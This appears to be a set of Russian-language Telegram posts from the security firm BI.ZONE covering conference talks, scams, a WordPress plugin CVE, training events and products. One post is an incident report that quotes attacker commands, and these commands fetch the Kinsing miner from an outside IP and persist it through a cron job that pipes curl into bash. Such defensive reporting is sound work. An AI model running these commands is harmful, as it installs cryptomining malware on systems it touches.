Так-с, так-с, так-с, что тут у нас? Доклады? Ахахаха, наконец-то

Мы выложили все записи выступлений OFFZONE 2024 в открытый доступ. Вас ждет очень много часов отборного контента — прямо к выходным :)

1️⃣ Main track
2️⃣ Fast track
3️⃣ AppSec.Zone
4️⃣ Threat.Zone
5️⃣ AI.Zone
6️⃣ Community track
7️⃣ AntiFraud.Zone
8️⃣ CTF track

🔺 Fake boss: как мошенники атакуют компании через соцсети и мессенджеры

Злоумышленники и хактивисты часто используют мессенджеры, чтобы атаковать частных лиц и компании. Один из таких популярных сценариев — схема fake boss, когда злоумышленники пишут жертвам от лица их руководителей.

Мошенники стремятся усыпить бдительность человека, подавить авторитетом крупного руководителя, заставляя сотрудника выполнить какие-либо действия, предупреждая о проверке «сверху» или будущих звонках якобы из силовых структур.

Руководитель BI.ZONE Brand Protection Дмитрий Кирюшкин рассказал Forbes, как часто встречаются случаи fake boss в практике кибербезопасности и как от них защититься.

Читать статью

🥑 Атака майнера: защита контейнерной среды на практике

Чем популярнее становятся контейнеры, тем больше появляется угроз, связанных с уязвимостями этих сред.

Рассказываем, как мы остановили атаку кластера активности Resourceful Wolf. Она началась с эксплуатации уязвимости публичного веб-приложения, запущенного в контейнере.

Что сделали злоумышленники:

1. Загрузили с внешнего ресурса ПО для майнинга Kinsing:

curl -o /tmp/libsystem.so http://95.142.47[.]27/libsystem.so ; curl -o /tmp/kinsing http://95.142.47[.]27/kinsing

Kinsing — вредоносное ПО на основе Golang, которое используется для добычи криптовалюты на взломанном сервере. Обычно злоумышленники устанавливают этот майнер в контейнере, поэтому для защиты от подобного ВПО важно иметь под рукой решения или сервисы, позволяющие видеть происходящее в таких средах.

2. Закрепились через задачу Cron:

* * * * * curl http://95.142.47[.]27/kinsing | bash > /dev/null 2>&1

3. Попробовали скрыть вредоносную активность в системе — добавили в /etc/ld.so.preload вредоносную библиотеку /tmp/libsystem.so.

4. Удалили историю вводимых команд.

Команда BI.ZONE TDR остановила атаку. Мы изолировали скомпрометированный хост, проанализировали контейнер и предотвратили вредоносную активность.

BI.ZONE EDR в составе сервиса BI.ZONE TDR позволяет вести мониторинг событий в контейнерах, при необходимости обеспечивая активное реагирование на хостах. В результате удается защитить контейнерные среды от ВПО вроде майнера Kinsing.

Напишите нам, и мы проведем бесплатное пилотирование.

🥥 Новый уязвимый плагин WordPress — новое защитное правило BI.ZONE WAF

О критической уязвимости CVE-2024-6386 в плагине WPML стало известно в конце августа. Она связана с компонентом интеграции с шорт-кодами WordPress и затрагивает версии продукта до 4.6.12 включительно. По шкале CVSS уязвимость получила оценку 9,9 из 10 баллов.

WPML используется для создания мультиязычных сайтов WordPress, он установлен более чем на 1,5 млн ресурсов.

CVE-2024-6386 позволяет злоумышленникам получить удаленное исполнение кода через инъекцию шаблонов на стороне сервера (SSTI), благодаря чему установить полный контроль над скомпрометированной системой.

В сети уже появился пример эксплуатации уязвимости, который позволяет провести атаку при небезопасной конфигурации приложения, если оно запущено в режиме отладки.

Наши специалисты разработали подход, который позволяет реализовать сценарий эксплуатации даже при стандартной конфигурации приложения. Благодаря исследованию уязвимости и самостоятельной разработке PoC в BI.ZONE WAF было создано правило фильтрации, детектирующее и блокирующее попытки использования уязвимости.

Как защититься

Разработчики плагина устранили уязвимость в версии 4.6.13, поэтому рекомендуем как можно скорее перейти на новую версию.

Также в защите от атак с эксплуатацией CVE-2024-6386 поможет BI.ZONE WAF. Сервис обеспечивает многоуровневую защиту веб‑приложений и API, блокируя попытки эксплуатации известных уязвимостей и противодействуя ботнет‑активности.

💎 До Cyber Polygon 2024 остался 1 день

Завтра в 12:00 (мск) стартует крупнейший международный онлайн-тренинг по повышению киберустойчивости Cyber Polygon 2024. На него уже зарегистрировалось более 300 команд из 60+ стран.

🔵Что ждет участников

Им предстоит расследовать сложный киберинцидент в компании, занимающейся разработкой ИИ-решений.

🔵Кому будет полезно

Специалистам по расследованию инцидентов и реагированию на них, экспертам по мониторингу и защите информационной инфраструктуры, а также студентам, обучающимся по направлениям кибербезопасности. После прохождения тренинга все участники получат сертификат. 

🔵Что еще интересного

Специально к конференции MENA ISC подготовили отчет Threat Zone, в котором проанализировали киберландшафт в странах GCC и выделили основные тренды. Например, что 8 из 10 самых активных кибергруппировок атакуют ради шпионажа и лишь 2 — ради выкупа. Скачать полную версию исследования можно по ссылке.

Регистрация на Cyber Polygon 2024 еще открыта — присоединяйтесь.

🙃 Стартовал крупнейший международный тренинг по повышению глобальной киберустойчивости Cyber Polygon 2024!

Сегодня на главной сцене международной конференции MENA ISC официальный старт тренингу дали директор группы компаний BI.ZONE Дмитрий Самарцев и директор по продуктам и технологиям BI.ZONE Муслим Меджлумов.

Узнать больше о тренинге и следить за топ-10 лидеров рейтинга можно на сайте мероприятия.

🌝 MENA ISC 2024: 5 трендов в киберландшафте стран Персидского залива

Представим исследование Threat Zone GCC 2024 на международной конференции MENA ISC, в рамках которой проходит онлайн-тренинг по кибербезопасности Cyber Polygon 2024.

Наши специалисты проанализировали топ-10 кибергруппировок, которые в 2023-м — начале 2024 года активнее всего атаковали компании Бахрейна, Катара, Кувейта, ОАЭ, Омана и Саудовской Аравии.

Удалось выделить 5 трендов:

1. Атаки на правительственные организации, нефтяные предприятия и телекоммуникационные компании чаще всего совершают ради шпионажа.

2. Наиболее активные кибергруппировки редко атакуют ради финансовой выгоды.

3. Основной ущерб от кибератак связан с кражей чувствительных данных.

4. Среди наиболее популярных инструментов злоумышленников — PowerShell и легитимные средства удаленного доступа.

5. Для получения первичного доступа киберпреступники чаще всего компрометируют сервисы, позволяющие получить удаленный доступ к инфраструктуре.

Подробнее

🍌 Эволюция BI.ZONE Compliance Platform: от соблюдения требований регуляторов до автоматизации процессов кибербезопасности

Специалисты по кибербезопасности сталкиваются с высокой нагрузкой. Работу усложняют чрезмерный объем данных для анализа, трудности с оценкой и приоритизацией рисков, количество требований и изменения в законодательстве.

Облегчить работу специалистов и автоматизировать рутину поможет BI.ZONE Compliance Platform.

Платформа позволяет автоматизировать работу с ПДн, КИИ и ГИС, а еще управление IT-активами, уязвимостями и аудитами. О других возможностях узнайте на бесплатном вебинаре 19 сентября.

Обсудим распространенные в кибербезопасности проблемы и расскажем, как платформа поможет их решить с помощью автоматизации процессов. Разберем сценарии использования и поделимся планами развития.

Cпикеры:

🔵Андрей Быков, руководитель центра консалтинга в области защиты данных;
🔵Лидия Ищенко, cтарший консультант по кибербезопасности, BI.ZONE Consulting.

Кому будет полезно: CISO, DPO, cпециалистам по защите данных и сотрудникам отдела кибербезопасности.

Когда: 19 сентября, четверг, 11:00–12:30 (мск).

Зарегистрироваться

😆 Реверс «Капсулы Нео» от VK на BI.ZONE Bug Bounty: поиск уязвимостей, отладка и неожиданные выводы

Не так давно Владимир Кононович, наш старший инженер по обратной разработке, получил предложение от BI.ZONE Bug Bounty протестировать умную колонку от VK. 

У Владимира большой опыт в реверс-инжиниринге — например, в прошлом году вы могли читать его рассказ о взломе саундбара Yamaha. На этот раз все оказалось сложнее, чем можно было представить. 

О некоторых особенностях проекта Владимир уже рассказал в докладе на OFFZONE 2024. Теперь он опубликовал на «Хабре» полный обзор всех нюансов отладки и раскручивания бага. 

Заходите, чтобы узнать:

🟦с какой стороны подступиться к оборудованию, о котором ничего не известно;
🟦где искать прошивки к китайским ноунейм-процессорам;
🟦как выполнить отладку, если она совсем не хочет выполняться;
🟦какую роль в таких проектах играет удача.

Читать

💡 Внедрение PAM: как получить максимум пользы от системы

Количество привилегированных пользователей в инфраструктуре непрерывно растет, а контролировать их полномочия в ручном режиме становится невозможно.

Для решения этой проблемы компании внедряют PAM. А чтобы все работало корректно, важно обратить внимание на следующее:

🟦Архитектура

Если система выстроена на контейнеризированных микросервисах, ее проще масштабировать на всю инфраструктуру без дополнительных лицензий, которые потребуются в случае использования монолитного решения.

🟦Процессы

Новый инструмент не повысит безопасность, если сохранить привычные подходы. Важно никому не выдавать пароли привилегированных учетных записей — система сама авторизует пользователя в доступных ему целевых системах с нужным уровнем полномочий.

🟦Сервисы самообслуживания

PAM задает жесткие рамки для администраторов и подрядчиков. Если эти ограничения не компенсировать, например не предложить удобный способ запрашивать гранулированные права самостоятельно, в формате системы обработки заявок, то сопротивление изменениям будет огромным.

О других важных деталях внедрения PAM и об эволюции российских систем рассказали на эфире AM Live — материалы уже доступны.

Смотреть запись

Читать обзор эфира